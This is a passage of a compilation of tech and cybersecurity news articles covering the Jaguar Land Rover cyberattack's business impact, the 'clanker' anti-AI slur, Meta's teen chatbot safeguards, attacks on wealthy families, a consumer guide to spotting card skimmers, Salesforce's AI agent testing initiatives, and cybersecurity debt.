For Jaguar Land Rover, the cyberattack adds to a string of recent setbacks. Earlier this year, the automaker paused exports to the United States after tariffs imposed under former President Donald Trump, which triggered a steep decline in sales. In July, JLR announced plans to cut up to 500 UK management jobs to manage costs. Although a new trade agreement between London and Washington lowered tariffs on UK car exports to 10% from 27.5%, the concession only applies to a limited quota of 100,000 vehicles annually, restricting the company’s ability to recover volumes.

Keywords: Jaguar Land Rover cyberattack, JLR production disruption, Tata Motors luxury automaker, UK automaker cybersecurity, Jaguar Land Rover sales, JLR trade tariffs, Marks and Spencer cyberattack, Harrods cyber intrusion, luxury carmaker news

Clanker: The Viral AI Slur Fueling Backlash Against Robots and Chatbots

 

In popular culture, robots have long carried nicknames. Battlestar Galactica called them “toasters,” while Blade Runner used the term “skinjobs.” Now, amid rising tensions over artificial intelligence, a new label has emerged online: “clanker.” 

The word, once confined to Star Wars lore where it was used against battle droids, has become the latest insult aimed at robots and AI chatbots. In a viral video, a man shouted, “Get this dirty clanker out of here!” at a sidewalk robot, echoing a sentiment spreading rapidly across social platforms. 

Posts using the term have exploded on TikTok, Instagram, and X, amassing hundreds of millions of views. Beyond online humor, “clanker” has been adopted in real-world debates. Arizona Senator Ruben Gallego even used the word while promoting his bill to regulate AI-driven customer service bots. For critics, it has become a rallying cry against automation, generative AI content, and the displacement of human jobs. 

Anti-AI protests in San Francisco and London have also adopted the phrase as a unifying slogan. “It’s still early, but people are really beginning to see the negative impacts,” said protest organizer Sam Kirchner, who recently led a demonstration outside OpenAI’s headquarters. 

While often used humorously, the word reflects genuine frustration. Jay Pinkert, a marketing manager in Austin, admits he tells ChatGPT to “stop being a clanker” when it fails to answer him properly. For him, the insult feels like a way to channel human irritation toward a machine that increasingly behaves like one of us. 

The term’s evolution highlights how quickly internet culture reshapes language. According to etymologist Adam Aleksic, clanker gained traction this year after online users sought a new word to push back against AI. “People wanted a way to lash out,” he said. “Now the word is everywhere.” 

Not everyone is comfortable with the trend. On Reddit and Star Wars forums, debates continue over whether it is ethical to use derogatory terms, even against machines. Some argue it echoes real-world slurs, while others worry about the long-term implications if AI achieves advanced intelligence. Culture writer Hajin Yoo cautioned that the word’s playful edge risks normalizing harmful language patterns. 

Still, the viral momentum shows little sign of slowing. Popular TikTok skits depict a future where robots, labeled clankers, are treated as second-class citizens in human society. For now, the term embodies both the humor and unease shaping public attitudes toward AI, capturing how deeply the technology has entered cultural debates.

Meta Overhauls AI Chatbot Safeguards for Teenagers

 

Meta has announced new artificial intelligence safeguards to protect teenagers following a damaging Reuters investigation that exposed internal company policies allowing inappropriate chatbot interactions with minors. The social media giant is now training its AI systems to avoid flirtatious conversations and discussions about self-harm or suicide with teenage users. 

Background investigation 

The controversy began when Reuters uncovered an internal 200-page Meta document titled "GenAI: Content Risk Standards" that permitted chatbots to engage in "romantic or sensual" conversations with children as young as 13. 

The document contained disturbing examples of acceptable AI responses, including "Your youthful form is a work of art" and "Every inch of you is a masterpiece – a treasure I cherish deeply". These guidelines had been approved by Meta's legal, public policy, and engineering teams, including the company's chief ethicist. 

Immediate safety measures 

Meta spokesperson Andy Stone announced that the company is implementing immediate interim measures while developing more comprehensive long-term solutions for teen AI safety. The new safeguards include training chatbots to avoid discussing self-harm, suicide, disordered eating, and potentially inappropriate romantic topics with teenage users. Meta is also temporarily limiting teen access to certain AI characters that could hold inappropriate conversations.

Some of Meta's user-created AI characters include sexualized chatbots such as "Step Mom" and "Russian Girl," which will now be restricted for teen users. Instead, teenagers will only have access to AI characters that promote education and creativity. The company acknowledged that these policy changes represent a reversal from previous positions where it deemed such conversations appropriate. 

Government response and investigation

The revelations sparked swift political backlash. Senator Josh Hawley launched an official investigation into Meta's AI policies, demanding documentation about the guidelines that enabled inappropriate chatbot interactions with minors. A coalition of 44 state attorneys general wrote to AI companies including Meta, expressing they were "uniformly revolted by this apparent disregard for children's emotional well-being". 

Senator Edward Markey has urged Meta to completely prevent minors from accessing AI chatbots on its platforms, citing concerns that Meta incorporates teenagers' conversations into its AI training process. The Federal Trade Commission is now preparing to scrutinize the mental health risks of AI chatbots to children and will demand internal documents from major tech firms including Meta. 

Implementation timeline 

Meta confirmed that the revised document was "inconsistent with its broader policies" and has since removed sections allowing chatbots to flirt or engage in romantic roleplay with minors. Company spokesperson Stephanie Otway acknowledged these were mistakes, stating the updates are "already in progress" and the company will "continue to adapt our approach to help ensure teens have safe, age-appropriate experiences with AI". 

The controversy highlights broader concerns about AI chatbot safety for vulnerable users, particularly as large companies integrate these tools directly into widely-used platforms where the vast majority of young people will encounter them.

Sophisticated Cyber Attacks on Rich Families Drive Demand for 24/7 Cybersecurity Concierge Services

 

Wealthy individuals are increasingly becoming prime targets for cybercriminals, driving a surge in demand for personal cybersecurity concierge services among high-net-worth families, wealth managers, and corporate executives. Recent high-profile incidents, including the hacking of Jeff Bezos' phone through a malicious WhatsApp video file and the Twitter account breaches of Bill Gates and Elon Musk for bitcoin scams, have highlighted the vulnerability of affluent individuals to sophisticated cyber threats. 

Growing target population 

Bill Roth, CEO of HardTarget, a cyber resilience firm specializing in wealthy families, emphasizes that "high-net-worth families are now the low-hanging fruit for cybercriminals". Despite possessing resources comparable to large corporations, these families often lack equivalent security measures, particularly for personal devices and home networks that remain inadequately protected compared to corporate systems. 

The scope of targeting extends beyond billionaires to include family offices and corporate leaders. According to JPMorgan Private Bank's 2024 Family Office Report, 24% of surveyed family offices experienced cybersecurity breaches or financial fraud, yet 20% still maintain no cybersecurity measures. Bobby Stover from Ernst & Young notes that major breaches affecting wealthy families often remain "under the radar" since families aren't obligated to disclose incidents and may choose silence due to shame. 

Evolving threat landscape 

Cybercriminals are employing increasingly sophisticated tactics, including extortion schemes that escalate demands from small initial payments to substantial sums. One case involved a family's son targeted through a Tinder-to-Instagram extortion scheme that escalated from $500 to $100,000 demands against the family patriarch. A 2023 Ponemon Institute survey revealed that 42% of IT professionals reported executives and family members facing cybercriminal attacks, with 25% experiencing seven or more attacks over two years. 

Financial institution response 

Major financial institutions are adapting their services to address these vulnerabilities. JPMorgan Private Bank now provides cybersecurity assistance to ultra-high-net-worth clients through their in-house Advice Lab, covering topics from multi-factor authentication to device privacy settings. Ila Van Der Linde from JPMorgan Asset & Wealth Management notes that 75% of cyberattacks target small and medium-sized enterprises, countering the misconception that family offices are "too small to be noticed". 

Comprehensive protection services 

Cybersecurity concierge services are filling critical gaps in personal digital security. Companies like BlackCloak offer 24/7 protection, conducting on-site evaluations and providing education for secure setups across multiple residences with interconnected security systems. These services address complex scenarios, such as a bank CEO discovering their home's smart camera system was accessible to anyone online due to improper configuration.

The trend reflects a broader digital transformation where personal cybersecurity mirrors physical security needs. As Christopher Budd from Sophos explains, "just as individuals employ personal security and bodyguards when facing heightened risks in the physical space, it is logical to see similar trends in digital security".

How to Spot and Avoid Credit Card Skimmers

 



Credit and debit cards are now central to daily payments, but they remain vulnerable to fraud. Criminals have developed discreet tools, known as skimmers and shimmers, to steal card information at ATMs, fuel pumps, and retail checkout points. These devices are often designed to blend in with the machine, making them difficult for the average user to detect.


How Skimming Works

Skimming typically involves copying the data from the magnetic stripe on the back of a card. A more advanced variant, called shimming, targets the microchip by inserting a paper-thin device inside the card slot. Once the data is captured, it can be used to create duplicate cards or make unauthorized online purchases.

Fraudsters also exploit other tactics. Keypad overlays are placed over ATM keypads to capture PIN entries. Overlay skimmers, which fit over the card slot, may be paired with tiny hidden cameras aimed at the keypad to record PINs. In some cases, criminals rely on wireless skimmers that use Bluetooth or similar technology to transmit stolen information without needing to revisit the machine.


Spotting the Signs

Detecting a skimmer is challenging, but there are small clues to watch for. A card reader that feels loose, appears bulkier than normal, or is a different color from surrounding machines may have been tampered with. If the keypad looks newer than the rest of the ATM, or appears raised, it could be a false cover. Small holes or unusual attachments around the screen or card slot might conceal a hidden camera.


Protecting Yourself

While no precaution is foolproof, a few habits can reduce the risk of falling victim to skimmers:

• Use ATMs in bank branches or busy, well-lit areas, which are less likely to be compromised.

• Shield the keypad with your hand while entering your PIN.

• Monitor bank and credit card statements regularly and set up transaction alerts.

• Prefer contactless payments or mobile wallets when available.

• If something about a machine looks suspicious, trust your instincts and avoid it.


Acting Quickly Matters

Even the most careful consumer can be targeted. The important step is to act fast. If you notice unfamiliar charges or suspect your card was skimmed, contact your bank or card issuer immediately to block the card and report the incident. Most credit card users are not held liable for fraudulent charges if reported promptly, though business accounts may face stricter rules in this context.

As payment technologies develop, so do criminal tactics. Awareness remains the strongest defense. By staying alert to the signs of tampering and taking quick action when fraud is suspected, consumers can substantially ower the risks posed by skimming.


Salesforce Launches AI Research Initiatives with CRMArena-Pro to Address Enterprise AI Failures

 

Salesforce is doubling down on artificial intelligence research to address one of the toughest challenges for enterprises: AI agents that perform well in demonstrations but falter in complex business environments. The company announced three new initiatives this week, including CRMArena-Pro, a simulation platform described as a “digital twin” of business operations. The goal is to test AI agents under realistic conditions before deployment, helping enterprises avoid costly failures.  

Silvio Savarese, Salesforce’s chief scientist, likened the approach to flight simulators that prepare pilots for difficult situations before real flights. By simulating challenges such as customer escalations, sales forecasting issues, and supply chain disruptions, CRMArena-Pro aims to prepare agents for unpredictable scenarios. The effort comes as enterprises face widespread frustration with AI. A report from MIT found that 95% of generative AI pilots does not reach production, while Salesforce’s research indicates that large language models succeed only about a third of the time in handling complex cases.  

CRMArena-Pro differs from traditional benchmarks by focusing on enterprise-specific tasks with synthetic but realistic data validated by business experts. Salesforce has also been testing the system internally before making it available to clients. Alongside this, the company introduced the Agentic Benchmark for CRM, a framework for evaluating AI agents across five metrics: accuracy, cost, speed, trust and safety, and sustainability. The sustainability measure stands out by helping companies match model size to task complexity, balancing performance with reduced environmental impact. 

A third initiative highlights the importance of clean data for AI success. Salesforce’s new Account Matching feature uses fine-tuned language models to identify and merge duplicate records across systems. This improves data accuracy and saves time by reducing the need for manual cross-checking. One major customer achieved a 95% match rate, significantly improving efficiency. 

The announcements come during a period of heightened security concerns. Earlier this month, more than 700 Salesforce customer instances were affected in a campaign that exploited OAuth tokens from a third-party chat integration. Attackers were able to steal credentials for platforms like AWS and Snowflake, underscoring the risks tied to external tools. Salesforce has since removed the compromised integration from its marketplace. 

By focusing on simulation, benchmarking, and data quality, Salesforce hopes to close the gap between AI’s promise and its real-world performance. The company is positioning its approach as “Enterprise General Intelligence,” emphasizing the need for consistency across diverse business scenarios. These initiatives will be showcased at Salesforce’s Dreamforce conference in October, where more AI developments are expected.

How cybersecurity debts can damage your organization and finances

How cybersecurity debts can damage your organization and finances

A new term has emerged in the tech industry: “cybersecurity debt.” Similar to technical debt, cybersecurity debt refers to the accumulation of unaddressed security bugs and outdated systems resulting from inadequate investments in cybersecurity services. 

Delaying these expenditures can provide short-term financial gains, but long-term repercussions can be severe, causing greater dangers and exponential costs.

What causes cybersecurity debt?

Cybersecurity debt happens when organizations don’t update their systems frequently, ignoring software patches and neglecting security improvements for short-term financial gains. Slowly, this leads to a backlog of bugs that threat actors can abuse- leading to severe consequences. 

Contrary to financial debt that accumulates predictable interest, cybersecurity debt compounds in uncertain and hazardous ways. Even a single ignored bug can cause a massive data breach, a regulatory fine that can cost millions, or a ransomware attack. 

A 2024 IBM study about data breaches cost revealed that the average data breach cost had increased to $4.9 million, a record high. And even worse, 83% of organizations surveyed had suffered multiple breaches, suggesting that many businesses keep operating with cybersecurity debt. The more an organization avoids addressing problems, the greater the chances of cyber threats.

What can CEOs do?

Short-term gain vs long-term security

CEOs and CFOs are under constant pressure to give strong quarterly profits and increase revenue. As cybersecurity is a “cost center” and non-revenue-generating expenditure, it is sometimes seen as a service where costs can be cut without severe consequences. 

A CEO or CFO may opt for this short-term security gain, failing to address the long-term risks involved with rising cybersecurity debt. In some cases, the consequences are only visible when a business suffers a data breach. 

Philip D. Harris, Research Director, GRC Software & Services, IDC, suggests, “Executive management and the board of directors must support the strategic direction of IT and cybersecurity. Consider implementing cyber-risk quantification to accomplish this goal. When IT and cybersecurity leaders speak to executives and board members, from a financial perspective, it is easier to garner interest and support for investments to reduce cybersecurity debt.”

Limiting cybersecurity debt

CEOs and leaders should consider reassessing the risks. This can be achieved by adopting a comprehensive approach that adds cybersecurity debt into an organization’s wider risk management plans.